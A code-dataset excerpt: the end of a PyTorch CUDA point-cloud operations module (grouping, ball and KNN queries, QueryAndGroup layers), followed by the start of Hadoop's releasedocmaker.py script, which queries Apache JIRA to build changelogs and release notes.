assert idx.is_contiguous()
b, c, n = features.size()
_, m, nsample = idx.size()
output = torch.cuda.FloatTensor(b, c, m, nsample)
pointops_cuda.grouping_forward_cuda(b, c, n, m, nsample, features, idx, output)
ctx.for_backwards = (idx, n)
return output
@staticmethod
def backward(ctx, grad_out: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
input: grad_out: (b, c, m, nsample)
output: (b, c, n), None
"""
idx, n = ctx.for_backwards
b, c, m, nsample = grad_out.size()
grad_features = torch.cuda.FloatTensor(b, c, n).zero_()
grad_out_data = grad_out.data.contiguous()
pointops_cuda.grouping_backward_cuda(b, c, n, m, nsample, grad_out_data, idx, grad_features.data)
return grad_features, None
grouping = Grouping.apply
class GroupingInt(Function):
@staticmethod
def forward(ctx, features: torch.Tensor, idx: torch.Tensor) -> torch.Tensor:
"""
input: features: (b, c, n), idx : (b, m, nsample) containing the indicies of features to group with
output: (b, c, m, nsample)
"""
assert features.is_contiguous()
assert idx.is_contiguous()
b, c, n = features.size()
_, m, nsample = idx.size()
output = torch.cuda.LongTensor(b, c, m, nsample)
pointops_cuda.grouping_int_forward_cuda(b, c, n, m, nsample, features, idx, output)
return output
@staticmethod
def backward(ctx, a=None):
return None, None
grouping_int = GroupingInt.apply
class BallQuery(Function):
@staticmethod
def forward(ctx, radius: float, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor) -> torch.Tensor:
"""
input: radius: float, radius of the balls
nsample: int, maximum number of features in the balls
xyz: torch.Tensor, (b, n, 3) xyz coordinates of the features
new_xyz: torch.Tensor, (b, m, 3) centers of the ball query
output: (b, m, nsample) tensor with the indicies of the features that form the query balls
"""
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
b, n, _ = xyz.size()
m = new_xyz.size(1)
idx = torch.cuda.IntTensor(b, m, nsample).zero_()
pointops_cuda.ballquery_cuda(b, n, m, radius, nsample, new_xyz, xyz, idx)
return idx
@staticmethod
def backward(ctx, a=None):
return None, None, None, None
ballquery = BallQuery.apply
class FeatureDistribute(Function):
@staticmethod
def forward(ctx, max_xyz: torch.Tensor, xyz: torch.Tensor) -> torch.Tensor:
"""
:param ctx:
:param max_xyz: (b, n, 3)
:param xyz: (b, m, 3)
:return: distribute_idx: (b, m)
"""
assert max_xyz.is_contiguous()
assert xyz.is_contiguous()
b, n, _ = max_xyz.size()
m = xyz.size(1)
distribute_idx = torch.cuda.IntTensor(b, m).zero_()
pointops_cuda.featuredistribute_cuda(b, n, m, max_xyz, xyz, distribute_idx)
return distribute_idx
@staticmethod
def backward(ctx, a=None):
return None, None
featuredistribute = FeatureDistribute.apply
class FeatureGather(Function):
@staticmethod
def forward(ctx, max_feature: torch.Tensor, distribute_idx: torch.Tensor) -> torch.Tensor:
'''
:param ctx:
:param max_feature: (b, c, n)
:param distribute_idx: (b, m)
:return: distribute_feature: (b, c, m)
'''
assert max_feature.is_contiguous()
assert distribute_idx.is_contiguous()
b, c, n = max_feature.size()
m = distribute_idx.size(1)
distribute_feature = torch.cuda.FloatTensor(b, c, m).zero_()
pointops_cuda.featuregather_forward_cuda(b, n, m, c, max_feature, distribute_idx, distribute_feature)
ctx.for_backwards = (distribute_idx, n)
return distribute_feature
@staticmethod
def backward(ctx, grad_distribute_feature: torch.Tensor):
'''
:param ctx:
:param grad_distribute_feature: (b, c, m)
:return: grad_max_feature: (b, c, n), None
'''
distribute_idx, n = ctx.for_backwards
b, c, m = grad_distribute_feature.size()
grad_max_feature = torch.cuda.FloatTensor(b, c, n).zero_()
grad_distribute_feature_data = grad_distribute_feature.data.contiguous()
pointops_cuda.featuregather_backward_cuda(b, n, m, c, grad_distribute_feature_data, distribute_idx, grad_max_feature.data)
return grad_max_feature, None
featuregather = FeatureGather.apply
class LabelStatBallRange(Function):
@staticmethod
def forward(ctx, radius: float, xyz: torch.Tensor, new_xyz: torch.Tensor, label_stat: torch.Tensor) -> torch.Tensor:
'''
:param ctx:
:param radius:
:param xyz: (b, n, 3)
:param new_xyz: (b, m, 3)
:param label_stat: (b, n, nclass)
:return: new_label_stat: (b, m, nclass)
'''
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
assert label_stat.is_contiguous()
b, n, nclass = label_stat.size()
m = new_xyz.size(1)
new_label_stat = torch.cuda.IntTensor(b, m, nclass).zero_()
pointops_cuda.labelstat_ballrange_cuda(b, n, m, radius, nclass, new_xyz, xyz, label_stat, new_label_stat)
return new_label_stat
@staticmethod
def backward(ctx, a=None):
return None, None, None, None
labelstat_ballrange = LabelStatBallRange.apply
class LabelStatIdx(Function):
@staticmethod
def forward(ctx, nsample: int, label_stat: torch.Tensor, idx: torch.Tensor) -> torch.Tensor:
'''
:param ctx:
:param nsample:
:param label_stat: (b, n, nclass)
:param idx: (b, m, nsample)
:return: new_label_stat: (b, m, nclass)
'''
assert label_stat.is_contiguous()
assert idx.is_contiguous()
b, n, nclass = label_stat.size()
m = idx.size(1)
new_label_stat = torch.cuda.IntTensor(b, m, nclass).zero_()
pointops_cuda.labelstat_idx_cuda(b, n, m, nsample, nclass, label_stat, idx, new_label_stat)
return new_label_stat
@staticmethod
def backward(ctx, a=None):
return None, None, None
labelstat_idx = LabelStatIdx.apply
class LabelStatAndBallQuery(Function):
@staticmethod
def forward(ctx, radius: float, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor, label_stat: torch.Tensor):
'''
:param ctx:
:param radius:
:param nsample:
:param xyz: (b, n, 3)
:param new_xyz: (b, m, 3)
:param label_stat: (b, n, nclass)
:return: new_label_stat: (b, m, nclass) idx: (b, m, nsample)
'''
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
assert label_stat.is_contiguous()
b, n, nclass = label_stat.size()
m = new_xyz.size(1)
new_label_stat = torch.cuda.IntTensor(b, m, nclass).zero_()
idx = torch.cuda.IntTensor(b, m, nsample).zero_()
pointops_cuda.labelstat_and_ballquery_cuda(b, n, m, radius, nsample, nclass, new_xyz, xyz, label_stat, idx, new_label_stat)
return new_label_stat, idx
@staticmethod
def backward(ctx, a=None, b=None):
return None, None, None, None, None
labelstat_and_ballquery = LabelStatAndBallQuery.apply
def pairwise_distances(x, y=None):
'''
Input: x is a Nxd matrix
y is an optional Mxd matirx
Output: dist is a NxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]
if y is not given then use 'y=x'.
i.e. dist[i,j] = ||x[i,:]-y[j,:]||^2
'''
x_norm = (x ** 2).sum(1).view(-1, 1)
if y is not None:
y_t = torch.transpose(y, 0, 1)
y_norm = (y ** 2).sum(1).view(1, -1)
else:
y_t = torch.transpose(x, 0, 1)
y_norm = x_norm.view(1, -1)
dist = x_norm + y_norm - 2.0 * torch.mm(x, y_t)
import numpy as np
return torch.clamp(dist, 0.0, np.inf)
class KNNQueryNaive(Function):
@staticmethod
def forward(ctx, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
KNN Indexing
input: nsample: int32, Number of neighbor
xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
output: idx: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
b, m, _ = new_xyz.size()
n = xyz.size(1)
'''
idx = torch.zeros(b, m, nsample).int().cuda()
for i in range(b):
dist = pairwise_distances(new_xyz[i, :, :], xyz[i, :, :])
[_, idxs] = torch.sort(dist, dim=1)
idx[i, :, :] = idxs[:, 0:nsample]
'''
# '''
# new_xyz_repeat = new_xyz.repeat(1, 1, n).view(b, m * n, 3)
# xyz_repeat = xyz.repeat(1, m, 1).view(b, m * n, 3)
# dist = (new_xyz_repeat - xyz_repeat).pow(2).sum(dim=2).view(b, m, n)
dist = (new_xyz.repeat(1, 1, n).view(b, m * n, 3) - xyz.repeat(1, m, 1).view(b, m * n, 3)).pow(2).sum(dim=2).view(b, m, n)
[_, idxs] = torch.sort(dist, dim=2)
idx = idxs[:, :, 0:nsample].int()
# '''
return idx
@staticmethod
def backward(ctx):
return None, None, None
knnquery_naive = KNNQueryNaive.apply
class KNNQuery(Function):
@staticmethod
def forward(ctx, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
KNN Indexing
input: nsample: int32, Number of neighbor
xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
output: idx: (b, m, nsample)
( dist2: (b, m, nsample) )
"""
if new_xyz is None:
new_xyz = xyz
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
b, m, _ = new_xyz.size()
n = xyz.size(1)
idx = torch.cuda.IntTensor(b, m, nsample).zero_()
dist2 = torch.cuda.FloatTensor(b, m, nsample).zero_()
pointops_cuda.knnquery_cuda(b, n, m, nsample, xyz, new_xyz, idx, dist2)
return idx
@staticmethod
def backward(ctx, a=None):
return None, None, None
knnquery = KNNQuery.apply
class KNNQueryExclude(Function):
@staticmethod
def forward(ctx, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
KNN Indexing
input: nsample: int32, Number of neighbor
xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
output: new_features: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
b, m, _ = new_xyz.size()
n = xyz.size(1)
'''
idx = torch.zeros(b, m, nsample).int().cuda()
for i in range(b):
dist = pairwise_distances(new_xyz[i, :, :], xyz[i, :, :])
[_, idxs] = torch.sort(dist, dim=1)
idx[i, :, :] = idxs[:, 0:nsample]
'''
# '''
# new_xyz_repeat = new_xyz.repeat(1, 1, n).view(b, m * n, 3)
# xyz_repeat = xyz.repeat(1, m, 1).view(b, m * n, 3)
# dist = (new_xyz_repeat - xyz_repeat).pow(2).sum(dim=2).view(b, m, n)
dist = (new_xyz.repeat(1, 1, n).view(b, m * n, 3) - xyz.repeat(1, m, 1).view(b, m * n, 3)).pow(2).sum(dim=2).view(b, m, n)
[_, idxs] = torch.sort(dist, dim=2)
idx = idxs[:, :, 1:nsample+1].int()
# '''
return idx
@staticmethod
def backward(ctx):
return None, None, None
knnquery_exclude = KNNQueryExclude.apply
class Le_QueryAndGroup_SameSize(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Le_QueryAndGroup_SameSize, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, n, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
assert xyz.size() == new_xyz.size()
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx) # (b, c, m, nsample)
if self.use_xyz:
#new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample) # le
new_features = grouped_features # (b, c, m, nsample)
else:
new_features = grouped_features
else:
assert self.use_xyz, "Cannot have not features and not use xyz as a feature!"
new_features = grouped_xyz
return grouped_xyz, new_features
class QueryAndGroup(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(QueryAndGroup, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx)
if self.use_xyz:
new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample)
else:
new_features = grouped_features
else:
assert self.use_xyz, "Cannot have not features and not use xyz as a feature!"
new_features = grouped_xyz
return new_features
class QueryAndGroup_Dilate(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(QueryAndGroup_Dilate, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, 2*self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(2*self.nsample, xyz, new_xyz) # (b, m, nsample)
idx2 = np.array([i for i in range(2*self.nsample)])
np.random.shuffle(idx2)
idx2 = idx2[:self.nsample]
idx = idx[:, :, idx2]
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx)
if self.use_xyz:
new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample)
else:
new_features = grouped_features
else:
assert self.use_xyz, "Cannot have not features and not use xyz as a feature!"
new_features = grouped_xyz
return new_features
class Le_QueryAndGroup(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Le_QueryAndGroup, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx) # (b, c, m, nsample)
if self.use_xyz:
#new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample) # le
new_features = grouped_features # (b, c, m, nsample)
else:
new_features = grouped_features
else:
assert self.use_xyz, "Cannot have not features and not use xyz as a feature!"
new_features = grouped_xyz
return grouped_xyz, new_features
class Gen_QueryAndGroupXYZ(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Gen_QueryAndGroupXYZ, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
#def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
#if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous() # BxNx3 -> Bx3xN
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
return grouped_xyz
class Le_QueryAndGroup_OnlyFeature(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Le_QueryAndGroup_OnlyFeature, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
#xyz_trans = xyz.transpose(1, 2).contiguous()
#grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
#grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx) # (b, c, m, nsample)
if self.use_xyz:
#new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample) # le
new_features = grouped_features # (b, c, m, nsample)
else:
new_features = grouped_features
else:
assert self.use_xyz, "Cannot have not features and not use xyz as a feature!"
new_features = grouped_xyz
return new_features
class GroupAll(nn.Module):
"""
Groups all features
"""
def __init__(self, use_xyz: bool = True):
super(GroupAll, self).__init__()
self.use_xyz = use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor, features: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: ignored torch
features: (b, c, n) descriptors of the features
output: new_features: (b, c+3, 1, N) tensor
"""
grouped_xyz = xyz.transpose(1, 2).unsqueeze(2)
if features is not None:
grouped_features = features.unsqueeze(2)
if self.use_xyz:
new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, 1, n)
else:
new_features = grouped_features
else:
new_features = grouped_xyz
return new_features
``` |
{
"source": "jiazhaoquan-bit/hadoop-3.1.3-src",
"score": 2
} |
#### File: lib/release-doc-maker/releasedocmaker.py
```python
from glob import glob
from optparse import OptionParser
from time import gmtime, strftime, sleep
from distutils.version import LooseVersion
import errno
import os
import re
import shutil
import sys
import urllib
import urllib2
import httplib
import json
from utils import to_unicode, sanitize_text, processrelnote, Outputs
try:
import dateutil.parser
except ImportError:
print "This script requires python-dateutil module to be installed. " \
"You can install it using:\n\t pip install python-dateutil"
sys.exit(1)
RELEASE_VERSION = {}
JIRA_BASE_URL = "https://issues.apache.org/jira"
SORTTYPE = 'resolutiondate'
SORTORDER = 'older'
NUM_RETRIES = 5
# label to be used to mark an issue as Incompatible change.
BACKWARD_INCOMPATIBLE_LABEL = 'backward-incompatible'
CHANGEHDR1 = "| JIRA | Summary | Priority | " + \
"Component | Reporter | Contributor |\n"
CHANGEHDR2 = "|:---- |:---- | :--- |:---- |:---- |:---- |\n"
ASF_LICENSE = '''
<!---
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-->
'''
def buildindex(title, asf_license):
"""Write an index file for later conversion using mvn site"""
versions = glob("[0-9]*.[0-9]*")
versions.sort(key=LooseVersion, reverse=True)
with open("index.md", "w") as indexfile:
if asf_license is True:
indexfile.write(ASF_LICENSE)
for version in versions:
indexfile.write("* %s v%s\n" % (title, version))
for k in ("Changes", "Release Notes"):
indexfile.write(" * [%s](%s/%s.%s.html)\n" %
(k, version, k.upper().replace(" ", ""),
version))
def buildreadme(title, asf_license):
"""Write an index file for Github using README.md"""
versions = glob("[0-9]*.[0-9]*")
versions.sort(key=LooseVersion, reverse=True)
with open("README.md", "w") as indexfile:
if asf_license is True:
indexfile.write(ASF_LICENSE)
for version in versions:
indexfile.write("* %s v%s\n" % (title, version))
for k in ("Changes", "Release Notes"):
indexfile.write(" * [%s](%s/%s.%s.md)\n" %
(k, version, k.upper().replace(" ", ""),
version))
class GetVersions(object):
""" List of version strings """
def __init__(self, versions, projects):
versions = versions
projects = projects
self.newversions = []
versions.sort(key=LooseVersion)
print "Looking for %s through %s" % (versions[0], versions[-1])
newversions = set()
for project in projects:
url = JIRA_BASE_URL + \
"/rest/api/2/project/%s/versions" % project.upper()
try:
resp = urllib2.urlopen(url)
except urllib2.HTTPError as err:
code = err.code
print "JIRA returns HTTP error %d: %s. Aborting." % (code, err.msg)
error_response = err.read()
try:
error_response = json.loads(error_response)
print "- Please ensure that specified projects are correct."
for message in error_response['errorMessages']:
print "-", message
except Exception:
print "Couldn't parse server response."
sys.exit(1)
datum = json.loads(resp.read())
for data in datum:
newversions.add(data['name'])
newlist = list(newversions.copy())
newlist.append(versions[0])
newlist.append(versions[-1])
newlist.sort(key=LooseVersion)
start_index = newlist.index(versions[0])
end_index = len(newlist) - 1 - newlist[::-1].index(versions[-1])
for newversion in newlist[start_index + 1:end_index]:
if newversion in newversions:
print "Adding %s to the list" % newversion
self.newversions.append(newversion)
def getlist(self):
return self.newversions
class Version(object):
"""Represents a version number"""
def __init__(self, data):
self.mod = False
self.data = data
found = re.match(r'^((\d+)(\.\d+)*).*$', data)
if found:
self.parts = [int(p) for p in found.group(1).split('.')]
else:
self.parts = []
# backfill version with zeroes if missing parts
self.parts.extend((0,) * (3 - len(self.parts)))
def __str__(self):
if self.mod:
return '.'.join([str(p) for p in self.parts])
return self.data
def __cmp__(self, other):
return cmp(self.parts, other.parts)
class Jira(object):
"""A single JIRA"""
def __init__(self, data, parent):
self.key = data['key']
self.fields = data['fields']
self.parent = parent
self.notes = None
self.incompat = None
self.reviewed = None
self.important = None
def get_id(self):
return to_unicode(self.key)
def get_description(self):
return to_unicode(self.fields['description'])
def get_release_note(self):
if self.notes is None:
field = self.parent.field_id_map['Release Note']
if field in self.fields:
self.notes = to_unicode(self.fields[field])
elif self.get_incompatible_change() or self.get_important():
self.notes = self.get_description()
else:
self.notes = ""
return self.notes
def get_priority(self):
ret = ""
pri = self.fields['priority']
if pri is not None:
ret = pri['name']
return to_unicode(ret)
def get_assignee(self):
ret = ""
mid = self.fields['assignee']
if mid is not None:
ret = mid['displayName']
return to_unicode(ret)
def get_components(self):
if len(self.fields['components']) > 0:
return ", ".join([comp['name'] for comp in self.fields['components']
])
else:
return ""
def get_summary(self):
return self.fields['summary']
def get_type(self):
ret = ""
mid = self.fields['issuetype']
if mid is not None:
ret = mid['name']
return to_unicode(ret)
def get_reporter(self):
ret = ""
mid = self.fields['reporter']
if mid is not None:
ret = mid['displayName']
return to_unicode(ret)
def get_project(self):
ret = ""
mid = self.fields['project']
if mid is not None:
ret = mid['key']
return to_unicode(ret)
def __cmp__(self, other):
result = 0
if SORTTYPE == 'issueid':
# compare by issue name-number
selfsplit = self.get_id().split('-')
othersplit = other.get_id().split('-')
result = cmp(selfsplit[0], othersplit[0])
if result == 0:
result = cmp(int(selfsplit[1]), int(othersplit[1]))
# dec is supported for backward compatibility
if SORTORDER in ['dec', 'desc']:
result *= -1
elif SORTTYPE == 'resolutiondate':
dts = dateutil.parser.parse(self.fields['resolutiondate'])
dto = dateutil.parser.parse(other.fields['resolutiondate'])
result = cmp(dts, dto)
if SORTORDER == 'newer':
result *= -1
return result
def get_incompatible_change(self):
if self.incompat is None:
field = self.parent.field_id_map['Hadoop Flags']
self.reviewed = False
self.incompat = False
if field in self.fields:
if self.fields[field]:
for flag in self.fields[field]:
if flag['value'] == "Incompatible change":
self.incompat = True
if flag['value'] == "Reviewed":
self.reviewed = True
else:
# Custom field 'Hadoop Flags' is not defined,
# search for 'backward-incompatible' label
field = self.parent.field_id_map['Labels']
if field in self.fields and self.fields[field]:
if BACKWARD_INCOMPATIBLE_LABEL in self.fields[field]:
self.incompat = True
self.reviewed = True
return self.incompat
def get_important(self):
if self.important is None:
field = self.parent.field_id_map['Flags']
self.important = False
if field in self.fields:
if self.fields[field]:
for flag in self.fields[field]:
if flag['value'] == "Important":
self.important = True
return self.important
class JiraIter(object):
"""An Iterator of JIRAs"""
@staticmethod
def collect_fields():
"""send a query to JIRA and collect field-id map"""
resp = urllib2.urlopen(JIRA_BASE_URL + "/rest/api/2/field")
data = json.loads(resp.read())
field_id_map = {}
for part in data:
field_id_map[part['name']] = part['id']
return field_id_map
@staticmethod
def query_jira(ver, projects, pos):
"""send a query to JIRA and collect
a certain number of issue information"""
count = 100
pjs = "','".join(projects)
jql = "project in ('%s') and \
fixVersion in ('%s') and \
resolution = Fixed" % (pjs, ver)
params = urllib.urlencode({'jql': jql,
'startAt': pos,
'maxResults': count})
return JiraIter.load_jira(params, 0)
@staticmethod
def load_jira(params, fail_count):
"""send query to JIRA and collect with retries"""
try:
resp = urllib2.urlopen(JIRA_BASE_URL + "/rest/api/2/search?%s" %
params)
except urllib2.HTTPError, err:
code = err.code
print "JIRA returns HTTP error %d: %s. Aborting." % (code, err.msg)
error_response = err.read()
try:
error_response = json.loads(error_response)
print "- Please ensure that specified projects, fixVersions etc. are correct."
for message in error_response['errorMessages']:
print "-", message
except Exception:
print "Couldn't parse server response."
sys.exit(1)
except httplib.BadStatusLine as err:
return JiraIter.retry_load(err, params, fail_count)
try:
data = json.loads(resp.read())
except httplib.IncompleteRead as err:
return JiraIter.retry_load(err, params, fail_count)
return data
@staticmethod
def retry_load(err, params, fail_count):
"""Retry connection up to NUM_RETRIES times."""
print(err)
fail_count += 1
if fail_count <= NUM_RETRIES:
print "Connection failed %d times. Retrying." % (fail_count)
sleep(1)
return JiraIter.load_jira(params, fail_count)
else:
print "Connection failed %d times. Aborting." % (fail_count)
sys.exit(1)
@staticmethod
def collect_jiras(ver, projects):
"""send queries to JIRA and collect all issues
that belongs to given version and projects"""
jiras = []
pos = 0
end = 1
while pos < end:
data = JiraIter.query_jira(ver, projects, pos)
if 'error_messages' in data:
print "JIRA returns error message: %s" % data['error_messages']
sys.exit(1)
pos = data['startAt'] + data['maxResults']
end = data['total']
jiras.extend(data['issues'])
if ver not in RELEASE_VERSION:
for issue in data['issues']:
for fix_version in issue['fields']['fixVersions']:
if 'releaseDate' in fix_version:
RELEASE_VERSION[fix_version['name']] = fix_version[
'releaseDate']
return jiras
def __init__(self, version, projects):
self.version = version
self.projects = projects
self.field_id_map = JiraIter.collect_fields()
ver = str(version).replace("-SNAPSHOT", "")
self.jiras = JiraIter.collect_jiras(ver, projects)
self.iter = self.jiras.__iter__()
def __iter__(self):
return self
def next(self):
data = self.iter.next()
j = Jira(data, self)
return j
class Linter(object):
"""Encapsulates lint-related functionality.
Maintains running lint statistics about JIRAs."""
_valid_filters = ["incompatible", "important", "version", "component",
"assignee"]
def __init__(self, version, options):
self._warning_count = 0
self._error_count = 0
self._lint_message = ""
self._version = version
self._filters = dict(zip(self._valid_filters, [False] * len(
self._valid_filters)))
self.enabled = False
self._parse_options(options)
@staticmethod
def add_parser_options(parser):
"""Add Linter options to passed optparse parser."""
filter_string = ", ".join("'" + f + "'" for f in Linter._valid_filters)
parser.add_option(
"-n",
"--lint",
dest="lint",
action="append",
type="string",
help="Specify lint filters. Valid filters are " + filter_string +
